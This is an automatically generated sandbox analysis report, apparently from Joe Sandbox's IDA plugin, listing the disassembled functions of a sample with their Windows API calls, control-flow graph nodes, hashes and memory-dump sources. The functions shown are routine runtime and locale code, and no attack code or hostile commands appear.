                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1096550386-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 379a36b690d0b1889dab456849c09a4dbeb4e2c3f8d0eee2ade039be666b1aa0
                                                                                                                                                                                                                                                                                                  • Instruction ID: 70bccb902212f64acf9e7f9e91fe6fa46871469d590b9593b7895a2551b381ea
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 379a36b690d0b1889dab456849c09a4dbeb4e2c3f8d0eee2ade039be666b1aa0
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F51A073600216AFEB235F65EC81EBB76AEEF45350B16052AFD04DA351EB31ED5087A0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,003D08CD,00000000,?,?,)=,AFD2407A,?,003D0A29), ref: 003D08E4
                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,003D08CD,00000000,?,?,)=,AFD2407A,?,003D0A29), ref: 003D08EB
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 003D08FD
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 62c6d710690bf01f08de54a3d3cce489fc2089d10efeb5f62f87666753593cc6
                                                                                                                                                                                                                                                                                                  • Instruction ID: 21627f20116cd9e2be8121d84c868e0410bea1f4e9ea1ac8804f47f5720f2800
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62c6d710690bf01f08de54a3d3cce489fc2089d10efeb5f62f87666753593cc6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23D01732000148AFCF262FA0FC49A4D7F2EEF04751F004021BA084E172CB758D419A80
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D6CF8: GetConsoleOutputCP.KERNEL32(AFD2407A,00000000,00000000,00000000), ref: 003D6D5B
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,00000000,?,003ED348,00000000,0000000C,00000000,00000000,?,00000000,003ED348,00000010,003CEC7F,00000000,00000000,00000000), ref: 003D7717
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 003D7721
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2915228174-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D96AD: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 003D96D8
                                                                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,003D99C4,?,00000000,?,?,?), ref: 003D9BDE
                                                                                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,003D99C4,?,00000000,?,?,?), ref: 003D9C20
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CodeInfoPageValid
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 546120528-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Fputc
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3078413507-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  control_flow_graph 279 3d71b0-3d7205 call 3c6a60 282 3d727a-3d728a call 3c5cbb 279->282 283 3d7207 279->283 285 3d720d 283->285 287 3d7213-3d7215 285->287 288 3d722f-3d7254 WriteFile 287->288 289 3d7217-3d721c 287->289 292 3d7256-3d7261 288->292 293 3d7272-3d7278 GetLastError 288->293 290 3d721e-3d7224 289->290 291 3d7225-3d722d 289->291 290->291 291->287 291->288 292->282 294 3d7263-3d726e 292->294 293->282 294->285 295 3d7270 294->295 295->282
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,00000000,?,003D76FD,00000000,00000000,00000000,?,0000000C,00000000), ref: 003D724C
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,003D76FD,00000000,00000000,00000000,?,0000000C,00000000,00000000,?,00000000,003ED348,00000010,003CEC7F,00000000,00000000), ref: 003D7272
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 442123175-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4688cb0b4549437ca869775aaf3f0c3fe09860a6f78b309006e595d4a9cfc240
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3695b9c577f11692b2fbc383df90e73a38bcb5a39fd425f8e8ae5a35e2098e21
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4688cb0b4549437ca869775aaf3f0c3fe09860a6f78b309006e595d4a9cfc240
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E021A032A002589BCF16CF69ED80AD9B7B9EB4C305F1444AAE906D7351E630DE428B60
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  control_flow_graph 296 3d4652-3d4657 297 3d4659-3d4671 296->297 298 3d467f-3d4688 297->298 299 3d4673-3d4677 297->299 301 3d469a 298->301 302 3d468a-3d468d 298->302 299->298 300 3d4679-3d467d 299->300 303 3d46f4-3d46f8 300->303 306 3d469c-3d46a9 GetStdHandle 301->306 304 3d468f-3d4694 302->304 305 3d4696-3d4698 302->305 303->297 307 3d46fe-3d4701 303->307 304->306 305->306 308 3d46ab-3d46ad 306->308 309 3d46d6-3d46e8 306->309 308->309 311 3d46af-3d46b8 GetFileType 308->311 309->303 310 3d46ea-3d46ed 309->310 310->303 311->309 312 3d46ba-3d46c3 311->312 313 3d46cb-3d46ce 312->313 314 3d46c5-3d46c9 312->314 313->303 315 3d46d0-3d46d4 313->315 314->303 315->303
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 003D469E
                                                                                                                                                                                                                                                                                                  • GetFileType.KERNELBASE(00000000), ref: 003D46B0
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FileHandleType
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3000768030-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8c63a93900fd4f15931826daf358e318612712d4f7d806cc9ccda3092a07087b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7552d8a04c01bf01906d02125ae66ecfd0156bff8eca18f96df2f1235d67d9e0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c63a93900fd4f15931826daf358e318612712d4f7d806cc9ccda3092a07087b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 381196735047914BC7328E3EAC88622BA98AB67330B39071BD1B797BF1C374D986D654
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  control_flow_graph 316 3d5916-3d5925 call 3d5448 319 3d594e-3d5968 call 3d5973 LCMapStringW 316->319 320 3d5927-3d594c LCMapStringEx 316->320 324 3d596e-3d5970 319->324 320->324
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LCMapStringEx.KERNELBASE(?,003D84CD,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 003D594A
                                                                                                                                                                                                                                                                                                  • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,003D84CD,?,?,00000000,?,00000000), ref: 003D5968
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2568140703-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 172dd9ddae896f89ad5777285865852e3de45fb83327d69f798bc00e6e80ad58
                                                                                                                                                                                                                                                                                                  • Instruction ID: 29859d24f8485f08e09571d1589dd4c5bc193efe46d98f6647a304fa98527f7a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 172dd9ddae896f89ad5777285865852e3de45fb83327d69f798bc00e6e80ad58
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16F0683200055AFBCF135FA1ED059DE3E2AAB483A1F054112FA1829120C732C971AB91
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  control_flow_graph 325 3d9781-3d97a3 326 3d98bc-3d98e2 325->326 327 3d97a9-3d97bb GetCPInfo 325->327 328 3d98e7-3d98ec 326->328 327->326 329 3d97c1-3d97c8 327->329 330 3d98ee-3d98f4 328->330 331 3d98f6-3d98fc 328->331 332 3d97ca-3d97d4 329->332 333 3d9904-3d9906 330->333 334 3d98fe-3d9901 331->334 335 3d9908 331->335 332->332 336 3d97d6-3d97e9 332->336 338 3d990a-3d991c 333->338 334->333 335->338 337 3d980a-3d980c 336->337 339 3d980e-3d9845 call 3d82d6 call 3d85cd 337->339 340 3d97eb-3d97f2 337->340 338->328 341 3d991e-3d992c call 3c5cbb 338->341 351 3d984a-3d987f call 3d85cd 339->351 342 3d9801-3d9803 340->342 345 3d9805-3d9808 342->345 346 3d97f4-3d97f6 342->346 345->337 346->345 349 3d97f8-3d9800 346->349 349->342 354 3d9881-3d988b 351->354 355 3d988d-3d9897 354->355 356 3d9899-3d989b 354->356 359 3d98ab-3d98b8 355->359 357 3d989d-3d98a7 356->357 358 3d98a9 356->358 357->359 358->359 359->354 360 3d98ba 359->360 360->341
APIs
• GetCPInfo.KERNEL32(E8458D00,?,003D99D0,003D99C4,00000000), ref: 003D97B3
Memory Dump Source
• Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3c0000_file.jbxd
Yara matches
Similarity
• API ID: Info
• String ID:
• API String ID: 1807457897-0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• __EH_prolog3_catch.LIBCMT ref: 003C1C06
  • Part of subcall function 003C2F91: std::_Lockit::_Lockit.LIBCPMT ref: 003C2F9D
  • Part of subcall function 003C2F91: int.LIBCPMT ref: 003C2FB0
  • Part of subcall function 003C2F91: std::_Lockit::~_Lockit.LIBCPMT ref: 003C2FF9
Memory Dump Source
• Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3c0000_file.jbxd
Yara matches
Similarity
• API ID: Lockitstd::_$H_prolog3_catchLockit::_Lockit::~_
• String ID:
• API String ID: 1693569656-0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Memory Dump Source
• Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3c0000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
• Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3c0000_file.jbxd
Yara matches
Similarity
• API ID: _swprintf
• String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 589789837-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4a3f94077df30133bd80dfada03373c4a7804388a9b7fe192ee4a40b1ac82c07
                                                                                                                                                                                                                                                                                                  • Instruction ID: a9150d56caa00d9b73ef7c1cdf97819ef576ba5f4af77f2f8018a5e1460cba4b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a3f94077df30133bd80dfada03373c4a7804388a9b7fe192ee4a40b1ac82c07
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE018F73500208AFDB12AF54CC82EABB7ADEB48314F00461AFA5596151EA31EE2597E2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: __floor_pentium4
                                                                                                                                                                                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                                                  • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2508670823c105d07b006d9c002df0af02d5219edec9290011ef828bbc44c925
                                                                                                                                                                                                                                                                                                  • Instruction ID: d448800be324906d99e1dc69a769abec976bbde52aefed3738c46914959e9743
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2508670823c105d07b006d9c002df0af02d5219edec9290011ef828bbc44c925
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 36D22972E082288FDB66DE28ED407EAB7B9EB44305F1545EAD40DE7240DB74AE85CF41
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,003DC732,00000002,00000000,?,?,?,003DC732,?,00000000), ref: 003DC4AD
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,003DC732,00000002,00000000,?,?,?,003DC732,?,00000000), ref: 003DC4D6
                                                                                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,?,003DC732,?,00000000), ref: 003DC4EB
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                                                  • Opcode ID: ca64fe28f1a41623b1e01b82e5fc386ca70ba3c84502ad03b00c94f6d37c4d3d
                                                                                                                                                                                                                                                                                                  • Instruction ID: a09f3b70893e66f72e97c17778741f86316b55c399519370a8342dfcb805728a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca64fe28f1a41623b1e01b82e5fc386ca70ba3c84502ad03b00c94f6d37c4d3d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6021C423A30112A6DB338F56E960AB7B3BAAF54F50B579526F909DB301EB32DD40D350
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: GetLastError.KERNEL32(?,00000008,003D89CA), ref: 003D42B5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: SetLastError.KERNEL32(00000000,003ED3A8,00000024,003CFBA9), ref: 003D4357
                                                                                                                                                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 003DC6F5
                                                                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 003DC73E
                                                                                                                                                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 003DC74D
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 003DC795
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 003DC7B4
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 415426439-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 57891c225e7cb091f6f7ea8fa3ec6d2715b5edf34874908252987a573308c30e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 16c845f377a6d15ef1dafabe607fc38e4280d84ea057dd227f2abfaff21e02e5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57891c225e7cb091f6f7ea8fa3ec6d2715b5edf34874908252987a573308c30e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C05162739202069FDB22DFA5EC41ABA77B8FF08700F19556AE514EB290EB70DD04CB61
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

